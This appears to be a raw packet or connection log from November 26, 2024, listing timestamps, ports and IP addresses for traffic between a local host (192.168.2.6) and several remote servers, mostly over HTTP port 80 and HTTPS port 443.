Nov 26, 2024 00:25:46.071305990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.071412086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.072269917 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.072336912 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.072406054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.072516918 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.073448896 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.073512077 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.073568106 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.074100018 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.074641943 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.074701071 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.074758053 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.074875116 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.075786114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.075850010 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.075917006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.076055050 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.076946974 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.077054977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.077117920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.078155041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.078279018 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.078428030 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.079286098 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.079396963 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.079499960 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.080486059 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.080553055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.080596924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.080741882 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.081640959 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.081737995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.081738949 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.081926107 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.082854033 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.082911968 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.082920074 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.082966089 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.084110975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.084124088 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.084193945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.085212946 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.085223913 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.085294008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.086304903 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.086370945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.129898071 CET	443	49859	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.129985094 CET	443	49859	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.130192041 CET	49859	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.130379915 CET	49859	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.130402088 CET	443	49859	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.130414009 CET	49859	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.130419016 CET	443	49859	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.136034012 CET	49875	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.136074066 CET	443	49875	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.136270046 CET	49875	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.137065887 CET	49875	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.137075901 CET	443	49875	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.212855101 CET	443	49860	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.212935925 CET	443	49860	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.213181973 CET	49860	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.215023994 CET	49860	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.215042114 CET	443	49860	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.215089083 CET	49860	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.215101004 CET	443	49860	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.220324993 CET	49876	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.220370054 CET	443	49876	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.220535040 CET	49876	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.220727921 CET	49876	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:46.220741987 CET	443	49876	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:46.225960016 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.226001024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.226042986 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.226083994 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.226558924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.226602077 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.226624966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.226653099 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.227135897 CET	443	49866	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.227426052 CET	49866	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.227440119 CET	443	49866	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.227487087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.227541924 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.227580070 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.227814913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.227847099 CET	443	49866	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.228634119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.228724003 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.228761911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.229015112 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.229659081 CET	49866	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.229746103 CET	443	49866	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.229827881 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.229882956 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.229938030 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.230159044 CET	49866	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.230971098 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.231034994 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.231113911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.231600046 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.232157946 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.232233047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.232261896 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.232391119 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.233323097 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.233376026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.233505964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.233593941 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.234498024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.234648943 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.234716892 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.235752106 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.235764980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.235810995 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.235842943 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.236926079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.237016916 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.237083912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.237591982 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.238017082 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.238075972 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.238173962 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.238226891 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.239181995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.239238977 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.239320993 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.239532948 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.240349054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.240531921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.240581989 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.240582943 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.241544962 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.241641045 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.241770983 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.242755890 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.242836952 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.242921114 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.243942976 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.244009018 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.244101048 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.245088100 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.245194912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.245265007 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.246284962 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.246357918 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.246364117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.246561050 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.247412920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.247476101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.247529984 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.247670889 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.248620987 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.248697996 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.248728991 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.249217033 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.249778032 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.249840975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.249867916 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.250024080 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.250955105 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.251027107 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.251105070 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.251240015 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.252111912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.252207994 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.252275944 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.253333092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.253382921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.253386021 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.253420115 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.254462957 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.254556894 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.254602909 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.254764080 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.255523920 CET	443	49863	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.255883932 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.255937099 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.256005049 CET	49863	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.256032944 CET	443	49863	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.256114960 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.256169081 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.256217957 CET	443	49862	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.256431103 CET	49862	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.256447077 CET	443	49862	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.256946087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.256994963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.257020950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.257255077 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.258007050 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.258054972 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.258095026 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.258213997 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.259171009 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.259237051 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.259296894 CET	443	49863	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.259339094 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.259346008 CET	49863	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.259375095 CET	443	49862	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.259428024 CET	49862	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.259507895 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.260368109 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.260430098 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.260494947 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.260894060 CET	49862	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.260982037 CET	443	49862	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.261308908 CET	49863	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.261374950 CET	443	49863	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.261476994 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.261586905 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.261590958 CET	49862	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.261598110 CET	443	49862	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.261603117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.261646032 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.261753082 CET	49863	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.261760950 CET	443	49863	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.262670994 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.262757063 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.262864113 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.262948990 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.263849020 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.263935089 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.263989925 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.264009953 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.264440060 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:46.264477015 CET	443	49877	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:46.265018940 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.265113115 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:46.265168905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.265196085 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.265278101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.265733957 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:46.265746117 CET	443	49877	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:46.266204119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.266263008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.266325951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.266396046 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.267391920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.267462015 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.267539978 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.268095970 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.268620014 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.268681049 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.268687010 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.268754005 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.269728899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.269788027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.269804955 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.269838095 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.270950079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.271089077 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.271172047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.272058964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.272162914 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.272196054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.272397041 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.273276091 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.273350954 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.273375034 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.273490906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.274430990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.274554968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.274580002 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.275047064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.275335073 CET	443	49866	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.275590897 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.275646925 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.275726080 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.275774002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.276806116 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.276906013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.276977062 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.277940035 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.277993917 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.278065920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.278587103 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.279153109 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.279221058 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.279294968 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.279413939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.280277014 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.280360937 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.280400038 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.280582905 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.281461954 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.281534910 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.281554937 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.281698942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.282634020 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.282675982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.282701969 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.282735109 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.283835888 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.283894062 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.283934116 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.284035921 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.284982920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.285043955 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.285111904 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.285228968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.286154032 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.286237001 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.286253929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.286392927 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.287337065 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.287408113 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.306044102 CET	49862	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.306118965 CET	49863	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.353039026 CET	443	49865	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.353899002 CET	443	49861	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.353925943 CET	443	49864	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.361044884 CET	49865	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.361063957 CET	443	49865	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.361202955 CET	49861	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.361212969 CET	443	49861	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.361330986 CET	49864	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.361351013 CET	443	49864	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.361514091 CET	443	49865	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.361901999 CET	49865	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.361974955 CET	443	49865	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.362190008 CET	49865	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.362353086 CET	443	49861	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.362407923 CET	49861	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.362436056 CET	443	49864	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.362489939 CET	49864	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.367171049 CET	49861	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.367253065 CET	443	49861	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.368141890 CET	49864	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.368223906 CET	443	49864	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.368812084 CET	49861	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.368818998 CET	443	49861	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.369007111 CET	49864	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.369014978 CET	443	49864	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.403341055 CET	443	49865	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:46.415448904 CET	49861	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.415535927 CET	49864	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:46.427546024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.427651882 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:46.427679062 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:46.427720070 CET	49795	80	192.168.2.6	185.215.113.206
